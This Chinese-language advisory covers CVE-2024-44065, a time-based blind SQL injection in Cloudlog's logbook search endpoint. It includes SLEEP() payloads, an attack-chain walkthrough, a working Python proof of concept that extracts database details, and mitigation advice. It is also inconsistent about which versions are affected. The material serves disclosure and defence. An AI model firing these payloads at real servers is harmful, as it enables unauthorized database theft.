CVE-2024-44065 Cloudlog qsoresults参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2024-44065

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Cloudlog

漏洞概述

CVE-2024-44065是Cloudlog日志管理系统中的一个严重安全漏洞，CVSS评分高达9.8分（满分10分）。该漏洞属于基于时间的盲注SQL注入（Time-based Blind SQL Injection）类型，存在于Cloudlog v2.6.15版本的Web应用接口中。攻击者可以通过构造恶意的SQL语句，利用应用程序对用户输入验证不足的缺陷，在未授权的情况下远程执行任意SQL查询操作。由于该漏洞的攻击复杂度较低且无需任何认证，远程攻击者可以直接通过互联网发起攻击，利用时间延迟函数（如SLEEP()）来推断数据库中的敏感信息，包括用户凭据、配置数据、业务记录等。成功利用此漏洞可能导致完整的数据库泄露，进而造成敏感信息外泄、用户隐私侵犯，甚至可能通过数据库操作进一步获得服务器控制权限。该漏洞的严重性在于其影响范围广泛且利用门槛极低，对使用受影响版本Cloudlog的组织构成重大安全威胁。

技术细节

该漏洞位于Cloudlog应用程序的日志查询功能模块中，具体端点为/index.php/logbookadvanced/search。问题参数为qsoresults，该参数在处理用户搜索请求时直接将输入传递给SQL查询语句而未进行充分的输入验证和参数化查询处理。攻击者可以利用此参数注入MySQL时间延迟函数构造恶意Payload。由于是盲注类型，应用程序不会直接返回查询结果，攻击者需要通过观察HTTP响应时间的差异来判断SQL语句执行的真假状态。典型的攻击Payload会包含SLEEP()函数，例如：qsoresults=1' AND (SELECT CASE WHEN (条件) THEN SLEEP(5) ELSE 0 END) AND '1'='1。通过改变条件表达式（如猜测数据库名、表明、字段值），攻击者可以逐步枚举数据库内容。攻击者还可以结合UNION注入或堆叠查询来执行更复杂的操作，如写入文件、修改数据或执行系统命令。此漏洞的利用不需要任何认证凭证，任何能够访问Web应用的网络用户都可以发起攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标Cloudlog服务器，确认版本为v2.6.15或更早版本

STEP 2

步骤2

访问Web应用的日志查询功能端点/index.php/logbookadvanced/search

STEP 3

步骤3

构造包含SQL注入Payload的HTTP POST请求，将恶意SQL语句注入到qsoresults参数中

STEP 4

步骤4

利用时间延迟函数SLEEP()构造条件判断语句，通过响应时间差异推断数据库信息

STEP 5

步骤5

逐步枚举数据库内容，包括数据库名、表名、字段名及敏感数据（如用户密码）

STEP 6

步骤6

提取关键数据后，攻击者可能进一步利用获取的信息进行横向移动或权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# CVE-2024-44065 Time-based Blind SQL Injection PoC
# Target: Cloudlog v2.6.15
# Endpoint: /index.php/logbookadvanced/search
# Vulnerable Parameter: qsoresults

TARGET_URL = "http://target-server/index.php/logbookadvanced/search"

def check_sqli(payload):
    """Send payload and check response time"""
    start_time = time.time()
    data = {"qsoresults": payload}
    try:
        response = requests.post(TARGET_URL, data=data, timeout=30)
        elapsed = time.time() - start_time
        return elapsed > 5  # True if SLEEP(5) was executed
    except:
        return False

def extract_db_version():
    """Extract database version using blind SQL injection"""
    payload = "1' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(5) ELSE 0 END) AND '1'='1"
    if check_sqli(payload):
        return "MySQL 5.x"
    return "Unknown"

def extract_database_name():
    """Extract current database name character by character"""
    db_name = ""
    for pos in range(1, 20):
        for char in range(32, 127):
            payload = f"1' AND (SELECT CASE WHEN (ASCII(SUBSTRING(database(),{pos},1))={char}) THEN SLEEP(5) ELSE 0 END) AND '1'='1"
            if check_sqli(payload):
                db_name += chr(char)
                print(f"[*] Database name: {db_name}")
                break
    return db_name

if __name__ == "__main__":
    print("[*] CVE-2024-44065 PoC - Cloudlog SQL Injection")
    print(f"[*] Target: {TARGET_URL}")
    version = extract_db_version()
    print(f"[*] Database Version: {version}")
    db_name = extract_database_name()
    print(f"[!] Extracted Database: {db_name}")

影响范围

Cloudlog < 2.6.15

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 在Web应用层部署输入过滤规则，拦截包含SQL关键字和特殊字符的请求；2) 配置Web应用防火墙规则识别基于时间的盲注攻击特征（如SLEEP()、BENCHMARK()等函数）；3) 对数据库账户实施最小权限原则，限制Web应用连接账户的权限范围；4) 启用数据库审计日志，监控异常的SQL执行行为；5) 考虑临时禁用日志搜索功能或实施IP白名单访问限制；6) 部署入侵检测系统监控异常的HTTP请求模式。